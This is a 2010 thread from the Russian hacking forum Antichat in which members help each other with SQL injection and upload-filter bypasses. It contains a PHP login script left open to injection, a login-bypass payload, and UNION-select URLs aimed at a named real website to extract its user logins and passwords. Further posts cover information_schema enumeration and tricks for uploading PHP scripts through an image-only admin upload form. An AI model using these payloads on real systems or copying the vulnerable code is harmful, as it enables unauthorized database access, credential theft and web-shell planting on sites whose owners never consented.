Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
26.02.2010, 00:01
|
|
Banned
Регистрация: 05.02.2010
Сообщений: 70
Провел на форуме:
177258
Репутация:
5
|
|
Помогите плиз! Бред какойто... тренируюсь в скулях. Вот мой код
PHP код:
if(isset($_POST['login']) && isset($_POST['password']))
{
$login=$_POST['login'];
$password=md5($_POST['password']);
$query="SELECT * FROM users WHERE login='$login' AND password='$password' LIMIT 1";
echo $query;
$response=mysql_query($query);
$result=mysql_fetch_array($response);
if($login==$result['login'] && $password==$result['password'])
$_SESSION['id']=$result['id'];
}
if(!isset($_SESSION['id']))
{
echo "
<form method=post>
<table>
<tr><td>Логин:</td><td><input type=text name=login></td></tr>
<tr><td>Пароль:</td><td><input type=text name=password></td></tr>
<tr><td><input type=submit name=submit value=Вход></td></tr>
</table>";
exit;
}
таблица users:
id | login | password
1 | admin | md5passs
я подставляю в форму логин: admin'; --
пароль: bla bla bla
сделал в сурипте отладочный вывод заппроса
PHP код:
SELECT * FROM users WHERE login='admin'; --' AND password='698d51a19d8a121ce581499d7b701668' LIMIT 1
но нифига не заходит, пишет Warning: mysql_fetch_array(): supplied argument is not a valid MySQL........ |
|
|
26.02.2010, 00:11
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
После каждого запроса дописывай
Код:
or die(mysql_error())
... И будешь видеть суть ошибки. |
|
|
|
26.02.2010, 00:34
|
|
Banned
Регистрация: 05.02.2010
Сообщений: 70
Провел на форуме:
177258
Репутация:
5
|
|
Сообщение от mailbrush
После каждого запроса дописывай
Код:
or die(mysql_error())
... И будешь видеть суть ошибки. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '36eba1e1e343279857ea7f69a597324e' LIMIT 1' at line 1
помогите ктонить знающий в чём трабла?
UPD: зашло двое мемберов и хер кто ответил...
Последний раз редактировалось scorpic393; 26.02.2010 в 00:49..
|
|
|
|
26.02.2010, 05:13
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
admin' or 'admin'='admin' --
(После -- пробел обязательно =\ )
Сообщение от Ershik
Есть иньекция.
Таблицы login and pass я вытащил успешно.
Таблица users
Но при попытке вытащить данные логина и пароля - белый экран или ошибка.
Как обходится этот баг?
_brandmauer-vlz.ru/?b=ph&id=-1+union+select+1,2,3,pass,5,6,7+from+users-- - белый экран
_brandmauer-vlz.ru/?b=ph&id=-1+union+select+1,2,3,pass,5,6,7+from+Users-- - ошибка
http://brandmauer-vlz.ru/?b=ph&id=-1+union+select+1,2,3,4,(SELECT+concat_ws(0x3a,logi n,pass)+FROM+users),6,7+--+
Видимо она вообще пустая =\
Последний раз редактировалось Ctacok; 26.02.2010 в 05:28..
|
|
|
|
26.02.2010, 10:39
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555
Репутация:
226
|
|
Есть какая-нибудь функция для определения текущей базы без скобок???
Всё кроме неё нашёл, мб кому-то и пригодится
user(), current_user(), system_user(), session_user() = current_user
version() = @@version
ось я только как без скобок знаю @@version_compile_os
А вот database() =???
|
|
|
|
26.02.2010, 10:59
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
можно так:
SELECT schema_name FROM information_schema.schemata limit 0,1
SELECT schema_name FROM information_schema.schemata limit 1,1
.....
не текущая, но все узнаешь, в принципе относительно по барабану, какая текущая, очень много вкусного бывает и в остальных
|
|
|
|
26.02.2010, 18:52
|
|
Участник форума
Регистрация: 15.07.2009
Сообщений: 158
Провел на форуме:
698831
Репутация:
34
|
|
как можно обойти фильтрацию загружаемого файла в админке ?!
по сути можно загружать "все файлы", но при заливке пхп-скрипта вылезает ошибка...что можно в таких случаях сделать ?
|
|
|
|
26.02.2010, 19:00
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Сообщение от daniel_1024
как можно обойти фильтрацию загружаемого файла в админке ?!
по сути можно загружать "все файлы", но при заливке пхп-скрипта вылезает ошибка...что можно в таких случаях сделать ?
.php5 попробуй залить
|
|
|
|
26.02.2010, 19:41
|
|
Участник форума
Регистрация: 15.07.2009
Сообщений: 158
Провел на форуме:
698831
Репутация:
34
|
|
не прокатило...там допустимо только JPG, GIF, PNG
|
|
|
|
26.02.2010, 19:46
|
|
Участник форума
Регистрация: 15.07.2009
Сообщений: 158
Провел на форуме:
698831
Репутация:
34
|
|
тоже нет...
может я бред говорю но нельзя ли сделать что-то вроде этого
т.е. к картинке приписать захексенный вредоносный код. не прокатит ? |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
